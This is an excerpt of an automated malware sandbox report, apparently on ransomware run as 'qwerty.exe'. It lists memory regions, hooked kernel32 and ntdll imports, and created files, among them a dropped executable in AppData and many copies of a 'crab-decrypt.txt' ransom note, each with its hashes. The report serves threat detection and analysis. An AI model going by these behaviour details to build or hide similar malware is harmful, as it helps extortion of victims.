windowsshell.manifest 0x00490000 0x00490fff Memory Mapped File Readable False False False -
index.dat 0x00490000 0x0049bfff Memory Mapped File Readable, Writable True False False -
pagefile_0x00000000004a0000 0x004a0000 0x004a1fff Pagefile Backed Memory Readable True False False -
index.dat 0x004b0000 0x004b7fff Memory Mapped File Readable, Writable True False False -
index.dat 0x004c0000 0x004cffff Memory Mapped File Readable, Writable True False False -
private_0x00000000004d0000 0x004d0000 0x005cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000005d0000 0x005d0000 0x00757fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000760000 0x00760000 0x008e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000008f0000 0x008f0000 0x01ceffff Pagefile Backed Memory Readable True False False -
private_0x0000000001cf0000 0x01cf0000 0x01eaffff Private Memory Readable, Writable True False False -
private_0x0000000001cf0000 0x01cf0000 0x01deffff Private Memory Readable, Writable True False False -
private_0x0000000001df0000 0x01df0000 0x01e6ffff Private Memory Readable, Writable True False False -
private_0x0000000001e70000 0x01e70000 0x01eaffff Private Memory Readable, Writable True False False -
private_0x0000000001eb0000 0x01eb0000 0x01faffff Private Memory Readable, Writable True False False -
private_0x0000000001fb0000 0x01fb0000 0x020affff Private Memory Readable, Writable True False False -
sortdefault.nls 0x020b0000 0x0237efff Memory Mapped File Readable False False False -
pagefile_0x0000000002380000 0x02380000 0x02772fff Pagefile Backed Memory Readable True False False -
private_0x0000000002780000 0x02780000 0x028fffff Private Memory Readable, Writable True False False -
private_0x0000000002780000 0x02780000 0x027dffff Private Memory Readable, Writable True False False -
private_0x0000000002780000 0x02780000 0x02782fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002790000 0x02790000 0x02792fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000027a0000 0x027a0000 0x027dffff Private Memory Readable, Writable True False False -
private_0x00000000027e0000 0x027e0000 0x0281ffff Private Memory Readable, Writable True False False -
private_0x0000000002820000 0x02820000 0x0285ffff Private Memory Readable, Writable True False False -
private_0x0000000002860000 0x02860000 0x02860fff Private Memory Readable, Writable True False False -
pagefile_0x0000000002860000 0x02860000 0x02860fff Pagefile Backed Memory Readable True False False -
private_0x0000000002870000 0x02870000 0x028affff Private Memory Readable, Writable True False False -
private_0x00000000028c0000 0x028c0000 0x028fffff Private Memory Readable, Writable True False False -
private_0x0000000002900000 0x02900000 0x029fffff Private Memory Readable, Writable True False False -
private_0x0000000002a00000 0x02a00000 0x02afffff Private Memory Readable, Writable True False False -
private_0x0000000002b00000 0x02b00000 0x02bfffff Private Memory Readable, Writable True False False -
private_0x0000000002c00000 0x02c00000 0x02dfffff Private Memory Readable, Writable True False False -
private_0x0000000002c00000 0x02c00000 0x02caffff Private Memory Readable, Writable True False False -
private_0x0000000002cb0000 0x02cb0000 0x02dbffff Private Memory Readable, Writable True False False -
private_0x0000000002df0000 0x02df0000 0x02dfffff Private Memory Readable, Writable True False False -
pidor.bmp 0x040f0000 0x045e1fff Memory Mapped File Readable True True False
dwmapi.dll 0x744a0000 0x744b2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x744c0000 0x7453ffff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-core-synch-l1-2-0.dll 0x74540000 0x74542fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x746e0000 0x746e5fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x746f0000 0x746fffff Memory Mapped File Readable, Writable, Executable False False False -
sensapi.dll 0x74700000 0x74705fff Memory Mapped File Readable, Writable, Executable False False False -
rtutils.dll 0x74710000 0x7471cfff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74720000 0x74771fff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x74780000 0x7491dfff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x74920000 0x7495afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74960000 0x74975fff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x74980000 0x74a3efff Memory Mapped File Readable, Writable, Executable False False False -
rasman.dll 0x74a40000 0x74a54fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x74a60000 0x74a66fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x74a70000 0x74a8bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74a90000 0x74ad3fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74ae0000 0x74b00fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74b10000 0x74b1afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x74ee0000 0x74ffcfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75170000 0x751c6fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x751d0000 0x75204fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75430000 0x75565fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x75700000 0x75744fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x757b0000 0x757bbfff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x75890000 0x75894fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x765a0000 0x7679afff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76890000 0x76895fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x768c0000 0x76a1bfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x76a20000 0x76aaefff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x76b40000 0x76c34fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
normaliz.dll 0x770a0000 0x770a2fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 202 entries are omitted.
The remaining entries can be found in flog.txt.
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x00000000002a0000:+0xbec 1. entry of qwerty.exe 4 bytes kernel32.dll:SetFileShortNameW+0x0 now points to pagefile_0x00000000005d0000:+0x160065
IAT private_0x00000000002a0000:+0xbec 2. entry of qwerty.exe 4 bytes kernel32.dll:VirtualAlloc+0x0 now points to private_0x00000000004d0000:+0x2d
IAT private_0x00000000002a0000:+0xbec 4. entry of qwerty.exe 4 bytes kernel32.dll:FileTimeToSystemTime+0x0 now points to pagefile_0x00000000005d0000:+0x150066
IAT private_0x00000000002a0000:+0xbec 5. entry of qwerty.exe 4 bytes kernel32.dll:LoadLibraryW+0x0 now points to qwerty.exe:+0x2002d
IAT private_0x00000000002a0000:+0xbec 7. entry of qwerty.exe 4 bytes kernel32.dll:GetProcAddress+0x0 now points to pagefile_0x00000000005d0000:+0x170069
IAT private_0x00000000002a0000:+0xbec 8. entry of qwerty.exe 4 bytes kernel32.dll:CreateMailslotW+0x0 now points to qwerty.exe:+0x3002d
IAT private_0x00000000002a0000:+0xbec 10. entry of qwerty.exe 4 bytes kernel32.dll:FlushFileBuffers+0x0 now points to pagefile_0x00000000005d0000:+0xf006e
IAT private_0x00000000002a0000:+0xbec 11. entry of qwerty.exe 4 bytes ntdll.dll:RtlDecodePointer+0x0 now points to qwerty.exe:+0x2002d
IAT private_0x00000000002a0000:+0xbec 13. entry of qwerty.exe 4 bytes kernel32.dll:SetLastError+0x0 now points to pagefile_0x00000000005d0000:+0x11006e
IAT private_0x00000000002a0000:+0xbec 14. entry of qwerty.exe 4 bytes kernel32.dll:CreateFileW+0x0 now points to private_0x00000000004d0000:+0x1002d
IAT private_0x00000000002a0000:+0xbec 16. entry of qwerty.exe 4 bytes kernel32.dll:SetUnhandledExceptionFilter+0x0 now points to pagefile_0x00000000005d0000:+0x170070
IAT private_0x00000000002a0000:+0xbec 17. entry of qwerty.exe 4 bytes kernel32.dll:GetCurrentProcess+0x0 now points to private_0x00000000004d0000:+0x3002d
IAT private_0x00000000002a0000:+0xbec 19. entry of qwerty.exe 4 bytes kernel32.dll:IsProcessorFeaturePresent+0x0 now points to pagefile_0x00000000005d0000:+0x150073
IAT private_0x00000000002a0000:+0xbec 20. entry of qwerty.exe 4 bytes kernel32.dll:QueryPerformanceCounter+0x0 now points to private_0x00000000004d0000:+0x6002d
IAT private_0x00000000002a0000:+0xbec 21. entry of qwerty.exe 4 bytes kernel32.dll:GetCurrentProcessId+0x0 now points to private_0x00000000002c0000:+0x10050
IAT private_0x00000000002a0000:+0xbec 22. entry of qwerty.exe 4 bytes kernel32.dll:GetCurrentThreadId+0x0 now points to pagefile_0x00000000005d0000:+0x4004c
IAT private_0x00000000002a0000:+0xbec 23. entry of qwerty.exe 4 bytes kernel32.dll:GetSystemTimeAsFileTime+0x0 now points to pagefile_0x00000000005d0000:+0x110074
IAT private_0x00000000002a0000:+0xbec 25. entry of qwerty.exe 4 bytes kernel32.dll:IsDebuggerPresent+0x0 now points to pagefile_0x0000000000760000:+0x73
IAT private_0x00000000002a0000:+0xbec 28. entry of qwerty.exe 4 bytes kernel32.dll:RtlUnwind+0x0 now points to pagefile_0x0000000000760000:+0x40061
IAT private_0x00000000002a0000:+0xbec 29. entry of qwerty.exe 4 bytes ntdll.dll:RtlEnterCriticalSection+0x0 now points to qwerty.exe:+0x1002d
IAT private_0x00000000002a0000:+0xbec 30. entry of qwerty.exe 4 bytes ntdll.dll:RtlLeaveCriticalSection+0x0 now points to private_0x00000000002c0000:+0x1005a
IAT private_0x00000000002a0000:+0xbec 31. entry of qwerty.exe 4 bytes ntdll.dll:RtlDeleteCriticalSection+0x0 now points to pagefile_0x0000000000760000:+0x30043
IAT private_0x00000000002a0000:+0xbec 32. entry of qwerty.exe 4 bytes kernel32.dll:InitializeCriticalSectionAndSpinCount+0x0 now points to pagefile_0x00000000005d0000:+0xf0072
IAT private_0x00000000002a0000:+0xbec 34. entry of qwerty.exe 4 bytes kernel32.dll:TlsGetValue+0x0 now points to pagefile_0x00000000005d0000:+0x80073
IAT private_0x00000000002a0000:+0xbec 35. entry of qwerty.exe 4 bytes kernel32.dll:TlsSetValue+0x0 now points to private_0x00000000004d0000:+0x6002d
IAT private_0x00000000002a0000:+0xbec 37. entry of qwerty.exe 4 bytes kernel32.dll:FreeLibrary+0x0 now points to pagefile_0x00000000005d0000:+0x16006d
IAT private_0x00000000002a0000:+0xbec 38. entry of qwerty.exe 4 bytes kernel32.dll:LoadLibraryExW+0x0 now points to qwerty.exe:+0x2002d
IAT private_0x00000000002a0000:+0xbec 40. entry of qwerty.exe 4 bytes kernel32.dll:GetModuleHandleExW+0x0 now points to pagefile_0x0000000000760000:+0x40075
IAT private_0x00000000002a0000:+0xbec 41. entry of qwerty.exe 4 bytes kernel32.dll:GetStdHandle+0x0 now points to private_0x00000000004d0000:+0x8002d
IAT private_0x00000000002a0000:+0xbec 42. entry of qwerty.exe 4 bytes kernel32.dll:WriteFile+0x0 now points to private_0x00000000002c0000:+0x1005a
IAT private_0x00000000002a0000:+0xbec 43. entry of qwerty.exe 4 bytes kernel32.dll:GetModuleFileNameA+0x0 now points to pagefile_0x0000000000760000:+0x30043
IAT private_0x00000000002a0000:+0xbec 44. entry of qwerty.exe 4 bytes kernel32.dll:MultiByteToWideChar+0x0 now points to pagefile_0x00000000005d0000:+0xf0072
IAT private_0x00000000002a0000:+0xbec 46. entry of qwerty.exe 4 bytes kernel32.dll:GetACP+0x0 now points to pagefile_0x00000000005d0000:+0x180071
IAT private_0x00000000002a0000:+0xbec 47. entry of qwerty.exe 4 bytes kernel32.dll:HeapFree+0x0 now points to private_0x00000000002c0000:+0x1007a
IAT private_0x00000000002a0000:+0xbec 48. entry of qwerty.exe 4 bytes ntdll.dll:RtlAllocateHeap+0x0 now points to qwerty.exe:+0x30045
IAT private_0x00000000002a0000:+0xbec 50. entry of qwerty.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to pagefile_0x00000000005d0000:+0x150061
IAT private_0x00000000002a0000:+0xbec 53. entry of qwerty.exe 4 bytes kernel32.dll:GetFileType+0x0 now points to pagefile_0x00000000005d0000:+0xb007a
IAT private_0x00000000002a0000:+0xbec 56. entry of qwerty.exe 4 bytes kernel32.dll:FindFirstFileExA+0x0 now points to pagefile_0x00000000005d0000:+0x80064
IAT private_0x00000000002a0000:+0xbec 57. entry of qwerty.exe 4 bytes kernel32.dll:FindNextFileA+0x0 now points to qwerty.exe:+0x1002d
IAT private_0x00000000002a0000:+0xbec 59. entry of qwerty.exe 4 bytes kernel32.dll:GetOEMCP+0x0 now points to pagefile_0x00000000005d0000:+0x110065
IAT private_0x00000000002a0000:+0xbec 60. entry of qwerty.exe 4 bytes kernel32.dll:GetCPInfo+0x0 now points to qwerty.exe:+0x1002d
IAT private_0x00000000002a0000:+0xbec 62. entry of qwerty.exe 4 bytes kernel32.dll:GetCommandLineW+0x0 now points to pagefile_0x00000000005d0000:+0x160065
IAT private_0x00000000002a0000:+0xbec 65. entry of qwerty.exe 4 bytes kernel32.dll:SetStdHandle+0x0 now points to pagefile_0x00000000005d0000:+0x150066
IAT private_0x00000000002a0000:+0xbec 66. entry of qwerty.exe 4 bytes kernel32.dll:GetProcessHeap+0x0 now points to qwerty.exe:+0x3002d
IAT private_0x00000000002a0000:+0xbec 68. entry of qwerty.exe 4 bytes kernel32.dll:WriteConsoleW+0x0 now points to pagefile_0x00000000005d0000:+0x150073
IAT private_0x00000000002a0000:+0xbec 69. entry of qwerty.exe 4 bytes ntdll.dll:RtlSizeHeap+0x0 now points to private_0x00000000004d0000:+0x6002d
IAT private_0x00000000002a0000:+0xbec 70. entry of qwerty.exe 4 bytes ntdll.dll:RtlReAllocateHeap+0x0 now points to private_0x00000000002c0000:+0x10050
IAT private_0x00000000002a0000:+0xbec 71. entry of qwerty.exe 4 bytes kernel32.dll:RaiseException+0x0 now points to pagefile_0x0000000000760000:+0x30043
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe 233.01 KB MD5: f563adf489b43a4fa6705a43b66cefd4
SHA1: 4889f1ba1af9d3dc1a31ab30ab782c64d06ba592
SHA256: 18e29dfe749c58626179e04ced6b005527a3185a0f309da0b5dff50b89a19011
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\ipv4bot_whatismyipaddress_com[1].htm 0.01 KB MD5: 01b9ff51a6529cd9d1645f59c2258904
SHA1: 73c1c875bf293b3dbb526427e46fbe2b6b58f248
SHA256: 53f9a285a7e5f0ccb8d76157f08a7c386d614ccd2f3501e07734bb7d7edc8bbf
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\ayphore[1].txt 0.54 KB MD5: 73c9cca74dd40031a8ef7792ad063a43
SHA1: f7999e832359a72b8e01641e8e1cb8c249e23a8e
SHA256: b3831ed72d16f2ae14082a63fd0f2be928fb9c6b243295d5758fa0611419302c
False
c:\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\$recycle.bin\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\$recycle.bin\s-1-5-21-2345716840-1148442690-1481144037-1000\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\perflogs\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\perflogs\admin\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\program files\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\program files (x86)\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\recovery\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\system volume information\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\system volume information\spp\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\system volume information\spp\onlinemetadatacache\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\adobe\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\collab\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\forms\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\javascripts\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\security\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\security\crlcache\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\adobe\flash player\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\adobe\flash player\assetcache\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\adobe\headlights\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\adobe\linguistics\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\adobe\linguistics\dictionaries\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\adobe\logtransport2\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\identities\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\identities\{31810c36-5d23-4cce-a3b4-316ded195c38}\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\macromedia\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\microsoft\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
